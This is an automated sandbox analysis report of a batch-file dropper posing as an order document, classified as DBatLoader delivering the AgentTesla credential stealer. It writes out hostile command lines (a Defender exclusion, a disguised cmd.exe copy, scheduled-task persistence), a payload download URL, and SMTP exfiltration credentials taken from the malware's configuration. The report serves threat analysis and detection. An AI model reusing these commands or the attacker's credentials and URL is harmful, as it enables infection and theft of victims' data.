Edit tour

Windows Analysis Report
RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat

Overview

General Information

Sample name:	RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat
Analysis ID:	1560318
MD5:	ae6a8a43561ba85215f8b9986001a520
SHA1:	08d50775b58ae5f13b971a674e7799477a5bd00c
SHA256:	a0b4998d451f008fd7f752ef86b9a7306684f9193f07db1986273727636da61e
Tags:	batuser-lowmal3
Infos:

Detection

AgentTesla, DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected DBatLoader

.NET source code contains very large strings

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates many large memory junks

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops executable to a common third party application directory

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Found large BAT file

Infects executable files (exe, dll, sys, html)

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 7972 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

extrac32.exe (PID: 8060 cmdline: extrac32 /y "C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)

x.exe (PID: 8084 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 67DAC6AE9EE770115DB85CC71979DC41)

cmd.exe (PID: 7396 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

esentutl.exe (PID: 7564 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)

esentutl.exe (PID: 7628 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)

esentutl.exe (PID: 7752 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)

conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

lxsyrsiW.pif (PID: 3192 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)

neworigin.exe (PID: 6424 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

server_BTC.exe (PID: 5868 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

powershell.exe (PID: 5836 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2044 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 2572 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TrojanAIbot.exe (PID: 8152 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cmd.exe (PID: 6660 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 748 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

TrojanAIbot.exe (PID: 1204 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)

Wisrysxl.PIF (PID: 4024 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 67DAC6AE9EE770115DB85CC71979DC41)

lxsyrsiW.pif (PID: 4688 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)

neworigin.exe (PID: 5072 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

server_BTC.exe (PID: 4912 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

Wisrysxl.PIF (PID: 8088 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 67DAC6AE9EE770115DB85CC71979DC41)

lxsyrsiW.pif (PID: 1056 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)

neworigin.exe (PID: 6344 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

server_BTC.exe (PID: 1812 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

TrojanAIbot.exe (PID: 7832 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Memory Dumps

Source	Rule	Description	Author
0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.1624352397.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Process Memory Space: neworigin.exe PID: 6424	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: neworigin.exe PID: 6424	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.x.exe.2e40000.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
13.0.neworigin.exe.a60000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.0.neworigin.exe.a60000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
13.0.neworigin.exe.a60000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 8084, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 8084, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 3192, ProcessName: lxsyrsiW.pif

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 8084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 5868, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5836, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 8084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 8084, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 3192, ProcessName: lxsyrsiW.pif

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 5868, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 5868, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f, ProcessId: 2572, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 6424, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49749

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 5868, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5836, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T17:00:13.455183+0100	2028371	3	Unknown Traffic	192.168.2.10	49713	198.252.105.91	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Avira: detection malicious, Label: HEUR/AGEN.1325995
Source: C:\Users\user\AppData\Local\Temp\x.exe	Avira: detection malicious, Label: HEUR/AGEN.1325995
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
Source: 13.0.neworigin.exe.a60000.0.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Wisrysxl.PIF	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\x.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\x.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49797 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.1474717040.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.000000002212F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.00000000220FE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330164805.00000000028C9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02E45908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_02E45908

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
